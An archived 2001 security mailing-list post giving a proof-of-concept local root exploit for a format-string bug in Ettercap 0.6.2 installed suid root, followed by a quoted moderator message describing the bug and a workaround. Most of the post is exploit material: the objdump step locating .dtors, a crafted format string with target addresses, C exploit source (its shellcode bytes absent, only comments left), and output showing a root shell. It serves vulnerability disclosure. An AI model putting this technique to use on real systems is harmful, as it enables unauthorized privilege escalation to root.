Proof of concept for the format bug in Ettercap 0.6.2

From: BAILLEUX Christophe (
Date: Wed Dec 05 2001 - 03:25:00 PST

  • Next message: Nick Lange: "Re: IE Denial of service (sorta)"

     Firstly, let's retrieve the address of the section .dtors:
     cb@tshaw$ objdump -s -j .dtors /usr/local/sbin/ettercap
     /usr/local/sbin/ettercap:     file format elf32-i386
     Contents of section .dtors:
     8119a70 ffffffff 00000000                    ........
     So the fmt string is composed of:
     - "000" for allignment.
     - "\x74\x9a\x11\x08\x76\x9a\x11\x08" provides the addresses where we
        expect to write (here  .dtors + 4 -- 0x8119a74.)
     - "%.49119x%16$hn%.16145x%15$hn" ret addr in shellcode.
     This format string was built using fmtbuilder:
     ---- ettercap-exp.c ----
     #include <stdio.h>
     #include <stdlib.h>
     int main()
             char buf[1024];
             char shellcode[] =
               /* setuid(0) */
               /* Aleph 1 shellcode */
             char *fmt = "000\x74\x9a\x11\x08\x76\x9a\x11\x08%.49119x%16$hn%.16145x%15$hn";
             memset(buf, 0x90, 1024);
             memcpy(buf + 1024 - strlen(shellcode), shellcode, strlen(shellcode));
             setenv("SHELLCODE", buf, 1);
             execl("/usr/local/sbin/ettercap", "ettercap", fmt, 0x0);
     ---- ettercap-exp.c  ----
     This demo is made with a suid root version.
     cb@tshaw$ gcc -o ettercap-exp ettercap-exp.c
     cb@tshaw$ ./ettercap-exp
     ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
     may the packets be with you...
     Invalid host address
     0000000000000000000000000000000000000000000000081020c0 !!
     sh-2.04# id
     uid=0(root) groups=100(users)
    Best regards,
    Christophe Bailleux - Network & System Security Engineer
    Club-Internet / T-Online France 
    Voice:+33-(0)1-5545-4789 -
    On Tue, 4 Dec 2001, Blue Boar wrote:
    > Goobles sent another post to vuln-dev today, which was rejected due
    > to personal attacks in their note.  I want to check out their claim, 
    > however.  If you want to see their original posting, it's on their
    > web site like the others, I'm sure.  It includes a claimed exploit,
    > which cannot be posted due to their wishes that it not be separated
    > from the advisory.  If someone wants to write an independent exploit,
    > I'd be happy to post that, provided it follows the list rules,
    > of course.
    > Here's the basic problem:
    > ettercap %x%x%x%x%x%x%x
    > ettercap 0.6.2 brought from the dark side of the net by ALoR and NaGA...
    > may the packets be with you...
    > Invalid host address 807a0ef807a0e900bffffb71bffff850805ad52 !!
    > Gobbles' point is that there is an option to configure it suid,
    > so this could be exploitable when that is used.  Why someone
    > would want a packet capture program to be used by non-priv users..
    > Well, I'm sure there's a good reason somewhere in the world.
    > Is anyone using it that way?  Are there OS distributions that come
    > with Ettercap installed by default?  And, of course, is it suid?
    > (I can't imagine it would be.)  The workaround is obvious, don't
    > run it suid or allow remote users who do not already have a shell
    > to execute it with a command-line parameter (such as via a web 
    > interface.)  
    > 					BB

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